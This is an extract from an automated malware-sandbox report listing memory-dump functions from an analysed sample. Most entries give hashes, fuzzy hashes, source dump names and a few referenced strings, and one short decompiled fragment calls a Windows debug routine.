					 *0x36bd91e0("true", __ecx,  *((intOrPtr*)(__ecx + 0x10)),  *((intOrPtr*)(__ecx + 0x18)), 0,  &_v5);
					 *_t22();
				}
				_t12 = E36AD9303(_t25 + 0x5c);
				if(( *(_t25 + 4) & 0x00000002) == 0) {
					_t12 = E36AF3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t25 - 4);
				}
				return _t12;
			}

0x36ad92b4
0x36ad92b6
0x36ad92b8
0x36ad92bd
0x36ad92c2
0x36ad92d5
0x36ad92db
0x36ad92db
0x36ad92e0
0x36ad92e9
0x36ad92fa
0x36ad92fa
0x36ad9302

APIs

RtlDebugPrintTimes.NTDLL ref: 36AD92D5

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 504c30f6df9e152a1fbff7132d6c078ca80e0f22512aad722b82c2a50ffeb9b3
Instruction ID: c74180f80dab0371db8628d44efbafa488ac2ba88e9b88b570aa1fe9a548f95b
Opcode Fuzzy Hash: 504c30f6df9e152a1fbff7132d6c078ca80e0f22512aad722b82c2a50ffeb9b3
Instruction Fuzzy Hash: 7BF0FA32204700ABD3319F09CC14F8ABBFDEF80B00F14055CA94A97491C6A1E909CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 36B69603 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0c8c5d2dd9bcbc6b982b0403e431ea5b2452eef2e5277cc6e8db87880ae4246
Instruction ID: e357885595b96f0132998a90b614a6d84c1be7547bf6d90cc7ec129ebbeb27c7
Opcode Fuzzy Hash: e0c8c5d2dd9bcbc6b982b0403e431ea5b2452eef2e5277cc6e8db87880ae4246
Instruction Fuzzy Hash: 53E0E572B10214ABEB00DB58D850F8A73FCEB8879CF1400A8F50AD7140D660DD01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 36B1A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 36B565D4

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 977a07ba7a3d83d3e4067c930abc662c41d62db0e3263822fecbfcc10f14fa64
Instruction ID: 7b210001ca020c5f5ea4855956a6bd19a51f58fe6cc731b87e8d3bce6af6f937
Opcode Fuzzy Hash: 977a07ba7a3d83d3e4067c930abc662c41d62db0e3263822fecbfcc10f14fa64
Instruction Fuzzy Hash: 7D718EB5E00329DFEB14CFA9D980ADDBBB2FF48350F11812AEA05A7255EB718951CF50

Uniqueness

Uniqueness Score: -1.00%

Function 36AF02F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#%u, xrefs: 36B44B8F

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: #%u
API String ID: 0-232158463
Opcode ID: 4fec2a46e6be6ac1e8ddea7c67fa4440af60c278a82b9b0f73b166e73dc1a150
Instruction ID: ca7e797811051b623fa51583210544e35103f58719c0b8b2ceca02ef94d68523
Opcode Fuzzy Hash: 4fec2a46e6be6ac1e8ddea7c67fa4440af60c278a82b9b0f73b166e73dc1a150
Instruction Fuzzy Hash: DE714871A1021A9FDB01DFA8CD94FAEB7F8EF08744F150065E904EB251EB34E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 36B6F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

@, xrefs: 36B6F4E7

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 1270eafa4ad1ecb009350c71943b8a0e3ef1f833ee4d24814bbdd6f6672cbea9
Instruction ID: aad0db2e970d9cfc1743f9778842b24270d190b31290fe3e9eff3b53ad2a62a5
Opcode Fuzzy Hash: 1270eafa4ad1ecb009350c71943b8a0e3ef1f833ee4d24814bbdd6f6672cbea9
Instruction Fuzzy Hash: 75519AB2514705AFE7118E26CD40F6BB7EDFB84758F404929BA849B290DBB1DD04CF92

Uniqueness

Uniqueness Score: -1.00%

Function 36AFE547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 36AFE5C4

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 9011988d2758c2641d6f6e71deae197d5722adae160675bf163452359352f8fd
Instruction ID: 853d21698878f66601091ffed35f12d403b03f7351f2c66e8bd3b2be9f79436b
Opcode Fuzzy Hash: 9011988d2758c2641d6f6e71deae197d5722adae160675bf163452359352f8fd
Instruction Fuzzy Hash: CC41A072929315ABE750DA65CD40F5BB7E8BF88B08F410929FA84EB180EB75C904C793

Uniqueness

Uniqueness Score: -1.00%

Function 36B141BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

@, xrefs: 36B14220

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c0e3eca1f6f8141910cf5131f1ecfd614971ec24af436a177c75329b0d2be675
Instruction ID: 8094ca9bd42716b11fa4ec71ec5f73231daab0afa8e92749e6d93ee587834877
Opcode Fuzzy Hash: c0e3eca1f6f8141910cf5131f1ecfd614971ec24af436a177c75329b0d2be675
Instruction Fuzzy Hash: 15517B71615710AFD320CF29C841A5BB7F8FF48710F018A2AFA95976A0E774D944CBE6

Uniqueness

Uniqueness Score: -1.00%

Function 36B5C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 36B5C3FF

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 65966aa19f9e73e41b4ff22b8c8bc4ab83f06cabd51022aafea09756fa745fc7
Instruction ID: 35e09afc9bb14df83ac62957650e3f4a15bbb22d1774259406728c8444df5060
Opcode Fuzzy Hash: 65966aa19f9e73e41b4ff22b8c8bc4ab83f06cabd51022aafea09756fa745fc7
Instruction Fuzzy Hash: 3C413FF2D0012DAFDB21DA60DC81FDEB77DAB45714F1145A9AB08AB140DB709E8C8FA5

Uniqueness

Uniqueness Score: -1.00%

Function 36B69429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

verifier.dll, xrefs: 36B694F0

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: verifier.dll
API String ID: 0-3265496382
Opcode ID: 919b17143b01eaed697f0baad7b257235da0f1eeec584b255670fcb2341b96d7
Instruction ID: ad388176c3026518d13b434ba7c6c77d54c217bcf6e471da7abe2fd097ab08ce
Opcode Fuzzy Hash: 919b17143b01eaed697f0baad7b257235da0f1eeec584b255670fcb2341b96d7
Instruction Fuzzy Hash: C031C7B6A103139FE7249F1E9860B26B7E5EB58359F90903AE709DF381E6718D81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 36B17425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 36B5442D

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction ID: c1bf40bbde5f32e68c3320594eab01000eb66968fc20ebdc7d8e1e902a5178c4
Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction Fuzzy Hash: FE41CD75A0062AEBEB10CF89C894FAEBBB4EF40745F11446AE945AB240DB349941CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 36B1360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

Flst, xrefs: 36B13651

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: Flst
API String ID: 0-2374792617
Opcode ID: 74852e85d4cf1e84d025bded3929f3caeb0f87584a30da0ef76d8fd5acd422c3
Instruction ID: f83d8bf07afabb0e1c4d369dc2985ebffd7366d3a4c26a113fbf55761a9e8e40
Opcode Fuzzy Hash: 74852e85d4cf1e84d025bded3929f3caeb0f87584a30da0ef76d8fd5acd422c3
Instruction Fuzzy Hash: 8541BAB0A09311EFE304CF19C580A06BBE5EF49714F11816EE5988F381EB71D842CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 36AD96E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

3Fw3Fw, xrefs: 36AD9757

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 3Fw3Fw
API String ID: 3446177414-4091346658
Opcode ID: 4e3efff702388ee5645a77d7bccf78b37cd3b7af803563a4a51357c13bc5686e
Instruction ID: 87cedbdc22c646c51adae985f457fd8f053f5060bf1e81bac5b678d4e3a05135
Opcode Fuzzy Hash: 4e3efff702388ee5645a77d7bccf78b37cd3b7af803563a4a51357c13bc5686e
Instruction Fuzzy Hash: 5E210076A04B10BFD3218F59CD20B0A7BB5EB84B64F120829AA14AF341DA31DD00CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 36B5C6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 36B5C722

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: f1d45d762624cec0cadebafa96e1255456da26c5d0d3a00d513943c188e69292
Instruction ID: 94800439b686f62a55b81066ce239b064c1a7f60b7e186fc20ad6355e9cf8c7a
Opcode Fuzzy Hash: f1d45d762624cec0cadebafa96e1255456da26c5d0d3a00d513943c188e69292
Instruction Fuzzy Hash: 4231E57AD00619AFEB15CA59CC45DAFBBB5EB82760F12412DEA04AB650D730DE08CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 36AF2760 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd4c566d1a4ebf66756be66c72cdb7497f6c20361757c88e35bd7335d8e7720
Instruction ID: 5579eda3b5a5a13bfbe9cdf67e2ca644ccfee450fb57eee3a16c0320081a8b93
Opcode Fuzzy Hash: 4cd4c566d1a4ebf66756be66c72cdb7497f6c20361757c88e35bd7335d8e7720
Instruction Fuzzy Hash: 5E32E174E007648FEB15DFAAC850BAEBBF2EF84744F20411DD8459B284EB35A852DF91

Uniqueness

Uniqueness Score: -1.00%

Function 36BA124C Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea625c98b813f422034453539c24a2f7d2ec2ee4a867681f10b94edcaf92d017
Instruction ID: 14200f718bee01ec13d628cad03ee06766fefbf763e9d7d40bd0280ad241a72a
Opcode Fuzzy Hash: ea625c98b813f422034453539c24a2f7d2ec2ee4a867681f10b94edcaf92d017
Instruction Fuzzy Hash: F6229075E043268FDB49CF59C890AAABBB6FF89354F248169D851EB344DB30E941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 36B784BB Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeca3c406c54a6ed149fc85754e42c04a268d3ddfab1561b528903abc6662ef9
Instruction ID: b689dfdafa136acf888733b1d4b2fabbda2aaecc1eacfa57e7a678869e1b627c
Opcode Fuzzy Hash: eeca3c406c54a6ed149fc85754e42c04a268d3ddfab1561b528903abc6662ef9
Instruction Fuzzy Hash: 6AD1C175E006199FEB05CF69C841AEEB7F1EF88344F158179D865A7280EB35EA05CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 36AD8347 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13784fcb77f011f1572d4f4ff8441ba78269399f42fe859d71486584b599059f
Instruction ID: bbd962a471639e026813864c6f7722324932b05571c46a714fa8ed332b4f0940
Opcode Fuzzy Hash: 13784fcb77f011f1572d4f4ff8441ba78269399f42fe859d71486584b599059f
Instruction Fuzzy Hash: 49D11471B003269BEB14CF29CCA0AAE73B5FF54748F654129EC15DB2A4EB34E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 36AED700 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70312835786cacd252030bee77f43c3be3b0c913924b87522d39751773ac02c9
Instruction ID: bc1d7066729e641c8b2768321647758ba3b2251effe1ae0535e3488f7cda1927
Opcode Fuzzy Hash: 70312835786cacd252030bee77f43c3be3b0c913924b87522d39751773ac02c9
Instruction Fuzzy Hash: 8AC1C275E013169FEB18EF5AC850BAEB7B2EF44314F588269EC14AB280D735E941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 36B21763 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77ac98d5f65a03e8d07c6c5b61f03fa8ffa87bee92fafaf134414805c37b13b8
Instruction ID: 781653495bf8e1a9c54acd02cfbd4fdd8af5cca04f3fb1fd4a66f8e2de266066
Opcode Fuzzy Hash: 77ac98d5f65a03e8d07c6c5b61f03fa8ffa87bee92fafaf134414805c37b13b8
Instruction Fuzzy Hash: 9BD102B59102149FEB41DF69C980B8A7BE9EF09344F1541BAEE09DF216EB31D905CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 36AFF380 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 691d312f2e63db49fcc8b696776ed8e3d809a9e0122b46172982b43bffe47f04
Instruction ID: a585ab4d5ccef3fa78989cea33062710a7c7ae0748469f1d617fa209b7c5e9e1
Opcode Fuzzy Hash: 691d312f2e63db49fcc8b696776ed8e3d809a9e0122b46172982b43bffe47f04
Instruction Fuzzy Hash: F3C153B5E212208BEB14CF19CD907A9B7B1FF48744F658099FC419F385E73A8941CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 36AE37E4 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe4cb436bdca75b78e7376a4263b265731cbb9b0038ff81f5b9a2938b0fbb64d
Instruction ID: 79107ccfa6ba2b1c50b3d1f5358b756e37f98dbc46c13f4d091ce77562ae18f8
Opcode Fuzzy Hash: fe4cb436bdca75b78e7376a4263b265731cbb9b0038ff81f5b9a2938b0fbb64d
Instruction Fuzzy Hash: F4C155B1E017199FDB15CFA9C950A9EBBF5FB48744F21406AE90AEB350EB34A901CF50

Uniqueness

Uniqueness Score: -1.00%

Function 36AF0445 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
Instruction ID: 72614cecd3191a583e293c1d8c8fab39fdeebd6e6c77fa38fa85258cb4ef345e
Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
Instruction Fuzzy Hash: E8B12431A10715AFEB16CB65CCA0BAEBBF6EF84304F150164E9519B241DB31DD41EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 36AE82E0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ee8714f2cab31cf4402745350d14cd2bbd0305f801b3ce06aa71955d2b378c9
Instruction ID: b14bf280c62160209ae8c770e477cf0b7de5d7e0fbddd384308df26391927c0f
Opcode Fuzzy Hash: 5ee8714f2cab31cf4402745350d14cd2bbd0305f801b3ce06aa71955d2b378c9
Instruction Fuzzy Hash: 69C16A749183418FE760CF15C894BABBBE4FF88344F50496EE9999B290D774E908CF92

Uniqueness

Uniqueness Score: -1.00%

Function 36ADC3C7 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74b31b45a3c7802ba3c6a55af9e460ba30cb534d7256cce6638b3c21f4d25813
Instruction ID: 92f370bbb4dff56f91473be5da0422f4179ee033664056f8280ef585ab5233c9
Opcode Fuzzy Hash: 74b31b45a3c7802ba3c6a55af9e460ba30cb534d7256cce6638b3c21f4d25813
Instruction Fuzzy Hash: BEB1A474B002A58BEB24CF65CC90BA9B3F5EF45744F5085E9D80AEB280EB309D85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 36B200A5 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 122358d52247c114fe062a6302e3c2080150d606ccafaeb6b89cbe2483d4524a
Instruction ID: 68ce26cc4f590a0cb2f414ef0a9f1a45b606bb837fa562bc986653d91d28cd9d
Opcode Fuzzy Hash: 122358d52247c114fe062a6302e3c2080150d606ccafaeb6b89cbe2483d4524a
Instruction Fuzzy Hash: A3A1DFB4A007269FEB24DF65C990BAAB7F1FF48354F504029EA59D7281DB34A811CF91

Uniqueness

Uniqueness Score: -1.00%

Function 36BB4080 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_36ab0000_hi38VYWujz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf0721a90cf79299a61da2854112c3b5dbe5bcc996df7e1453266193e30a927d
Instruction ID: e14d647d66ca3ef29d1164f08716dcdb95fc0f63bd87401f843279215e64941e
Opcode Fuzzy Hash: bf0721a90cf79299a61da2854112c3b5dbe5bcc996df7e1453266193e30a927d
Instruction Fuzzy Hash: 74A1EBB2A14621AFDB11CF24CD80B6AB7E5FB48304F450928F585EB654D734EC11CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 36AFE310 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.45280294767.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 36AB0000, based on PE: true

Associated: 0000000B.00000002.45280294767.0000000036BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.45280294767.0000000036BDD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

